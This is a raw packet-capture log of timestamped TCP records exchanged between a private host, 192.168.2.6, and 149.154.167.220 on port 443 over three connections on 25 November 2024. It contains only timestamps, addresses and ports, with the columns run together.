                                                                                      Nov 25, 2024 13:40:53.122124910 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.122240067 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.122261047 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.167336941 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.242079973 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.242319107 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.242383003 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.242403984 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.287374020 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.361506939 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.361675024 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.361716032 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.361726046 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.361843109 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.362446070 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.362468004 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.407341957 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.480901957 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.481077909 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.481106997 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.481120110 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.481204987 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:53.523344040 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.599647045 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.605576992 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:53.983282089 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:54.347743034 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.415446043 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.415559053 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.415575981 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.415604115 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.415618896 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.415651083 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.416131020 CET49927443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.416148901 CET44349927149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.495290041 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.495335102 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:56.495407104 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.495678902 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:56.495696068 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:57.861772060 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:57.861918926 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:57.891208887 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:57.891220093 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:57.891493082 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:57.891499996 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:57.891607046 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:57.891613007 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:58.735807896 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:58.735903025 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:40:58.735965014 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:58.736006975 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:58.736490011 CET49945443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:40:58.736507893 CET44349945149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:00.915422916 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:00.915481091 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:00.915541887 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:00.915951014 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:00.915966034 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.283173084 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.284008026 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.284598112 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.284607887 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.284852028 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.284857035 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.285043955 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.285064936 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.286977053 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.286998034 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.292970896 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.292998075 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.295973063 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.295989037 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296005964 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296014071 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296070099 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296078920 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296210051 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296224117 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296262980 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296273947 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296343088 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296377897 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296390057 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296415091 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296449900 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296463966 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296473980 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296485901 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296525002 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296534061 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296576023 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296592951 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296601057 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296605110 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296678066 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296690941 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296700001 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296706915 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296715975 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296724081 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296778917 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296792030 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296829939 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296844006 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296854973 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296861887 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296874046 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296881914 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296941042 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.296951056 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.296991110 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297002077 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297040939 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297053099 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297072887 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297076941 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297151089 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297157049 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297172070 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297182083 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297240019 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297251940 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297277927 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297290087 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297332048 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297344923 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.297379017 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297421932 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297463894 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297472954 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297534943 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297606945 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297662020 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297679901 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297730923 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.297781944 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.343333960 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.344192982 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344284058 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344296932 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344429970 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344523907 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344567060 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344597101 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344646931 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344681025 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.344736099 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.387331963 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.389189005 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389245987 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389381886 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389451981 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389504910 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389539957 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389584064 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389628887 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389664888 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.389708042 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.435342073 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.435643911 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.435847998 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.435894966 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.435960054 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436053038 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436068058 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436094046 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436150074 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436192036 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.436218977 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.483335972 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.483885050 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.483911037 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.483932972 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.483973980 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.483982086 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.484009981 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.484081984 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.484092951 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.484102964 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.528007984 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.528084040 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.528245926 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.528273106 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530194998 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530258894 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530302048 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530309916 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530323029 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530369997 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.530384064 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.571341991 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.649054050 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.649226904 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.649255991 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.649276018 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.649342060 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.649365902 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.691337109 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.691458941 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.691715956 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.739324093 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.763753891 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.763905048 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.763940096 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.764059067 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.769576073 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.769635916 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.769748926 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.769778967 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.769810915 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.769857883 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.769877911 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.769984961 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.770158052 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.770225048 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.770236969 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.770374060 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.770412922 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.811338902 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.814239979 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.814392090 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.814435005 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.814563990 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.814589977 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.855334997 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.889453888 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.889616013 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.889620066 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.889671087 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.889741898 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.889756918 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.890012026 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.892095089 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.892119884 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.892250061 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.892270088 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.892374992 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.892390013 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.893759012 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.893893003 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.893920898 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.894061089 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.894076109 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.894076109 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895153999 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.895273924 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895298004 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895339012 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.895407915 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895428896 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895442009 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:02.895471096 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895482063 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895529032 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895545006 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895627022 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.895639896 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:02.939328909 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.004194021 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.004349947 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.004381895 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.004513979 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.004545927 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.005597115 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.005647898 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.005749941 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.005774021 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.005830050 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.005918026 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.005976915 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.005996943 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.006093979 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009345055 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.009362936 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.009447098 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009476900 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.009541988 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009556055 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.009603977 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009620905 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.009685040 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009731054 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009757996 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009850979 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.009886980 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.010792017 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.010864019 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.010962963 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.010992050 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.011025906 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.011034966 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.011126041 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.012134075 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.012192011 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.012321949 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.012346983 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.012620926 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.013523102 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.013571024 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.013711929 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.013737917 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.014192104 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.014219046 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.014585972 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.014605999 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.014858961 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.014884949 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.015181065 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.015247107 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.015271902 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.015665054 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.015683889 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.015912056 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.016010046 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016045094 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016052008 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016062021 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016072035 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016122103 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.016753912 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.017018080 CET44349958149.154.167.220192.168.2.6
                                                                                      Nov 25, 2024 13:41:03.017057896 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.017148018 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.017196894 CET49958443192.168.2.6149.154.167.220
                                                                                      Nov 25, 2024 13:41:03.017211914 CET49958443192.168.2.6149.154.167.220
